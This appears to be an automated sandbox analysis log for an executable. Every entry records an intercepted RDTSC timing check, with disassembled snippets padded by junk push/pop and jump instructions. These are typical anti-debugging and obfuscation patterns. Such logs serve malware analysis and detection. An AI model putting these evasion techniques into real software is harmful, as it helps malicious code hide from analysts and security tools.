Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A004A1 second address: A004CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F9h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F77012B90EAh 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A004CE second address: A004F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jl 00007F77004F22DEh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F77004F22C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A0076F second address: A00773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A00773 second address: A00785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 jo 00007F77004F22BEh 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A00CC5 second address: A00CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9FF64B second address: 9FF64F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9FF64F second address: 9FF66C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pushad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9FF66C second address: 9FF672 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9FF672 second address: 9FF69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F77012B90EEh 0x0000000b push ecx 0x0000000c jmp 00007F77012B90EAh 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jp 00007F77012B90E6h 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A07499 second address: A0749F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A0749F second address: A074AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jbe 00007F77012B90E6h 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A0789A second address: A078A1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A07015 second address: A07019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A07019 second address: A0701F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A0701F second address: A07025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A07E25 second address: A07E39 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F77004F22BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A07E39 second address: A07E3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A0B661 second address: A0B667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A0B667 second address: A0B66B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A0B66B second address: A0B66F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A0AE70 second address: A0AE76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A0AE76 second address: A0AE9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77004F22BDh 0x00000009 popad 0x0000000a jmp 00007F77004F22C2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A0AE9A second address: A0AEC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90EFh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F77012B90F7h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A0B187 second address: A0B18B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A0B18B second address: A0B191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A0DBE2 second address: A0DBFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22BEh 0x00000007 jnl 00007F77004F22B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A0DBFA second address: A0DC0B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F77012B90E6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A0DC0B second address: A0DC1E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F77004F22B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jbe 00007F77004F22B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A0DC1E second address: A0DC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A0D8D7 second address: A0D8FA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F77004F22B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007F77004F22B6h 0x00000011 jmp 00007F77004F22C0h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A12B1A second address: A12B4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F6h 0x00000007 jmp 00007F77012B90F2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F77012B90E6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A11DB1 second address: A11DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A11DB5 second address: A11DB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A12071 second address: A1207A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A124A0 second address: A124D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F8h 0x00000007 jmp 00007F77012B90F4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A12679 second address: A1267F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1267F second address: A126BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F77012B90E6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007F77012B90F0h 0x00000010 popad 0x00000011 jmp 00007F77012B90F5h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jnl 00007F77012B90E6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A16482 second address: A16488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1C737 second address: A1C73B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1C73B second address: A1C772 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22C8h 0x00000007 jmp 00007F77004F22C7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1C772 second address: A1C792 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1B15A second address: A1B160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1B160 second address: A1B164 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1B164 second address: A1B170 instructions: 0x00000000 rdtsc 0x00000002 je 00007F77004F22B6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1B170 second address: A1B175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1B175 second address: A1B18E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77004F22C3h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1B2C5 second address: A1B2C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1B2C9 second address: A1B2E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77004F22C2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1B2E4 second address: A1B2EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1B5F2 second address: A1B609 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1B609 second address: A1B622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77012B90F5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1B622 second address: A1B626 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: 9BC2BB second address: 9BC2C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1B8F9 second address: A1B8FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1B8FD second address: A1B90F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a popad 0x0000000b jne 00007F77012B90E6h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1B90F second address: A1B921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77004F22BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1BA7D second address: A1BA99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a jc 00007F77012B90FCh 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1BA99 second address: A1BA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A1C443 second address: A1C447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A22E18 second address: A22E1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A22E1E second address: A22E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A22E22 second address: A22E28 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A230D9 second address: A230DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A230DD second address: A230E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A230E1 second address: A2310C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F77012B90EAh 0x0000000f jmp 00007F77012B90ECh 0x00000014 pushad 0x00000015 popad 0x00000016 push esi 0x00000017 pop esi 0x00000018 popad 0x00000019 push edx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c pushad 0x0000001d popad 0x0000001e pop edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A2310C second address: A23117 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F77004F22B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A233FD second address: A2340C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnp 00007F77012B90E6h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A2340C second address: A23411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A23411 second address: A2342A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90EFh 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F77012B90E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A23A4C second address: A23A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F77004F22B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A23A56 second address: A23A6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90F0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A23DC4 second address: A23DCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A2408C second address: A24096 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F77012B90E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A2435A second address: A2437A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F77004F22C1h 0x0000000c jmp 00007F77004F22BBh 0x00000011 push eax 0x00000012 js 00007F77004F22B6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A28C7D second address: A28CA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77012B90F3h 0x00000009 jmp 00007F77012B90F5h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A27DA3 second address: A27DBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A27F1E second address: A27F39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77012B90EBh 0x00000007 jmp 00007F77012B90ECh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A27F39 second address: A27F48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22BAh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A27F48 second address: A27F9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77012B90F8h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F77012B90F7h 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d jmp 00007F77012B90F0h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A28105 second address: A28109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A28252 second address: A2825A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A2825A second address: A28293 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F77004F22C3h 0x00000008 jmp 00007F77004F22BDh 0x0000000d jmp 00007F77004F22C6h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 push edx 0x00000018 pop edx 0x00000019 ja 00007F77004F22B6h 0x0000001f pop esi 0x00000020 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A28418 second address: A2841E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A285C7 second address: A285CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A285CC second address: A285D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F77012B90E6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A36C9B second address: A36CC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F77004F22BBh 0x0000000e jmp 00007F77004F22C8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A35258 second address: A35263 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A35263 second address: A3526A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A353FF second address: A35403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A35403 second address: A3540C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A356A8 second address: A356C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F77012B90E6h 0x0000000a pushad 0x0000000b jng 00007F77012B90E6h 0x00000011 pushad 0x00000012 popad 0x00000013 jnl 00007F77012B90E6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A3580A second address: A3580E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A3580E second address: A35871 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jns 00007F77012B90F5h 0x0000000e push eax 0x0000000f push edi 0x00000010 pop edi 0x00000011 jmp 00007F77012B90F3h 0x00000016 pop eax 0x00000017 jl 00007F77012B90EEh 0x0000001d jbe 00007F77012B90E6h 0x00000023 push esi 0x00000024 pop esi 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jmp 00007F77012B90F0h 0x0000002e pushad 0x0000002f popad 0x00000030 jnl 00007F77012B90E6h 0x00000036 popad 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A35871 second address: A3588E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77004F22C9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A3588E second address: A35898 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F77012B90E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tXEKP1ThBP.exeRDTSC instruction interceptor: First address: A35B26 second address: A35B4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77004F22C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jo 00007F77004F22BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
